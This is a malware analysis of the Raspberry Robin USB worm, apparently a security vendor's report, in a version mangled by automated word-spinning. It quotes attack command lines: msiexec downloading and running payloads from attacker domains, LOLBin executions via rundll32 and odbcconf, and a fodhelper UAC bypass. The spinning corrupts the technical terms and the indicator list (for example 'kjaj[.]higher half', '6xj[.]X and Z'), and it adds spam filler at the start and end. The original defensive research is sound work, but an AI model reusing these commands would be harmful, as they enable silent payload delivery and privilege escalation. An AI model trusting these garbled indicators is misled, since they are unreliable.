Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks

not fairly Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks will lid the newest and most present info one thing just like the world. achieve entry to slowly thus you comprehend with ease and appropriately. will improve your data skillfully and reliably


Throughout our menace looking workouts over the previous a number of months, we started to look at a particular sample of msiexec.exe utilization throughout totally different endpoints. As we delve into particular person property, we discover traces of a lately found malware referred to as Raspberry Robin. The RedCanary analysis staff first coined the title of this malware of their weblog submit, and Sekoia printed a Flash report on the exercise beneath the title QNAP Worm. Each articles provide glorious evaluation of malware conduct. Our findings assist and enrich earlier analysis on the subject.

execution chain

Raspberry Robin is a worm that spreads by way of an exterior drive. After the preliminary an infection, it downloads its payload by way of msiexec.exe of QNAP cloud accounts, run your code by way of rundll32.exe, and establishes a command and management (C2) channel by way of TOR connections.

Picture 1: Raspberry Robin execution chain

Let’s stroll by way of the steps of the removing chain to see how this malware works.

Supply and Exploitation

Raspberry Robin is delivered by way of contaminated exterior drives. As soon as connected, cmd.exe attempt to execute instructions from a file inside that disk. This file is a .lnk file or a file with a particular naming sample. Recordsdata with this sample show a 2-5 character title with a usually obscure extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. As well as, the attacker makes use of an extreme variety of whitespace/non-printable characters and adjustments case to keep away from string matching detection strategies. Instance command strains embody:

  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd
  • C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RC:WINDOWSsystem32cmd.exe

The pattern file for the supply could be discovered at this URL:

Subsequent, we observe explorer.exe operating with an obscure command line argument, generated by a earlier occasion of cmd.exe. This obscure argument appears to take the title of an contaminated exterior drive or .lnk file that was beforehand executed. A number of the samples had values ​​that included USB, USB DISK, or USB Drive, whereas different samples had extra particular names. In every occasion of explorer.exe we see that the adversary is altering the case to keep away from detection:

  • Explorer [redacted]
  • explorer [redacted]
  • Explorer usb drive
  • USB DISK explorer


Postpartum and preliminary run, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. Makes use of -q both /q together with the usual set up parameter to function silently. As soon as once more, higher and decrease case letters are used to evade detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC-Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you possibly can see above, the URLs used for payload obtain have a particular sample. Domains use 2-4 character names with obscure TLDs that embody .xyz, .hk, .data, .pw, .cx, .me, and extra. The URL paths have a single listing with a random 11-character string, adopted by the sufferer’s hostname and username. In community telemetry, we additionally observe the home windows installer consumer agent on account of using msiexec.exe. To detect Raspberry Robin by way of its URL sample, use this common expression:


If we glance up the WHOIS info for given domains, we see that area registration dates return to February 2015. We additionally see a rise in registered domains from September 2021, which aligns with Raspberry’s preliminary observations. Robin by our friends.

WHOIS creation date Rely
9/12/2015 1
8/10/2020 1
11/14/2020 1
3/7/2021 1
7/26/2021 two
09/11/2021 two
09/23/2021 9
09/24/2021 6
09/26/2021 4
09/27/2021 two
9/11/2021 3
10/11/2021 1
11/18/2021 two
11/21/2021 3
11/12/2021 7
12/31/2021 7
01/17/2022 6
01/30/2022 eleven
01/31/2022 3
04/17/2022 5

Desk 1: Distribution of area creation dates over time

Related domains have SSL certificates with the Topic Various Identify of q74243532.myqnapcloud.com, which factors to the underlying QNAP cloud infrastructure. Additionally, its URL shopping outcomes return login pages to QNAP’s QTS service:

Determine 2: QNAP QTS login web page from related domains

As soon as the payload is downloaded, it runs by way of varied system binaries. First, rundll32.exe use the ShellExec_RunDLL perform of shell32.dll to make the most of system binaries, similar to msiexec.exe, odbcconf.exeboth management.exe. These binaries are used to execute the payload saved in C:ProgramData[3 chars]

  • C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a regsvr C:ProgramDataTvbzhixyye.lock. /a CONFIGSYSDSN wgdpb YNPMVSV /A CONFIGDSN dgye AVRAU pzzfvzpihrnyj
  • exe SHELL32, ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a regsvr C:ProgramDataEuoikdvnbb.xml.
  • C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.

Adopted by the execution of fodhelper.exe, which has the auto raised bit set to true. That is typically exploited by adversaries to bypass Consumer Account Management and execute extra instructions with escalated privileges. [3]. To observe suspicious executions of fodhelper.exe, we advise monitoring your situations with none command line arguments.

command and management

Raspberry Robin configures its C2 channel by way of operating extra system binaries with none command line arguments, which is sort of uncommon. That most likely factors to the injection of processes with elevated privileges in earlier steps of execution. Makes use of dllhost.exe, rundll32.exe, Y regsvr32.exe to arrange a TOR connection.

Detection by way of international menace alerts

In Cisco World Risk Alerts obtainable by way of Cisco Safe Community Analytics and Cisco Safe Endpoint, we monitor this exercise beneath the Raspberry Robin menace object. Picture 3 exhibits a pattern of Raspberry Robin detection:

Determine 3: Pattern Raspberry Robin detection in Cisco World Risk Alerts


Raspberry Robin tries to go unnoticed by utilizing system binaries, case delicate, TOR-based C2, and abusing compromised QNAP accounts. Though we now have comparable intelligence gaps (how does it infect exterior drives, what are its actions on the goal) as our friends, we’re constantly monitoring their actions.

Indicators of compromise

Write Surroundings IOC
Area payload supply k6j[.]p w
Area payload supply kjaj[.]higher half
Area payload supply v0[.]c x
Area payload supply zk4[.]me
Area payload supply zk5[.]co
Area payload supply 0dz[.]me
Area payload supply 0e[.]Sure
Area payload supply 5qw[.]p w
Area payload supply 6w[.]re
Area payload supply 6xj[.]X and Z
Area payload supply aij[.]hk
Area payload supply b9[.]p.m
Area payload supply glnj[.]nl
Area payload supply j4r[.]X and Z
Area payload supply j68[.]info
Area payload supply j8[.]Sure
Area payload supply jjl[.]a
Area payload supply jzm[.]p w
Area payload supply k6c[.]group
Area payload supply kj1[.]X and Z
Area payload supply kr4[.]X and Z
Area payload supply l9b[.]group
Area payload supply lwip[.]re
Area payload supply mzjc[.]it’s
Area payload supply nt3[.]X and Z
Area payload supply what[.]Artwork
Area payload supply tiua[.]United Kingdom
Area payload supply vn6[.]co
Area payload supply z7s[.]group
Area payload supply k5x[.]X and Z
Area payload supply 6 years[.]re
Area payload supply doem[.]Re
Area payload supply bpy[.]IN
Area payload supply l5k[.]X and Z
Area payload supply uQW[.]soccer
Area payload supply t7[.]New Zealand
Area payload supply 0t[.]yT


  1. Raspberry Robin will get the worm early: https://redcanary.com/weblog/raspberry-robin/
  2. QNAP Worm: Who Income From Crime? – https://7095517.fs1.hubspotusercontent-na1.internet/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/


I hope the article not fairly Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks provides notion to you and is beneficial for additive to your data

Raspberry Robin: Highly Evasive Worm Spreads over External Disks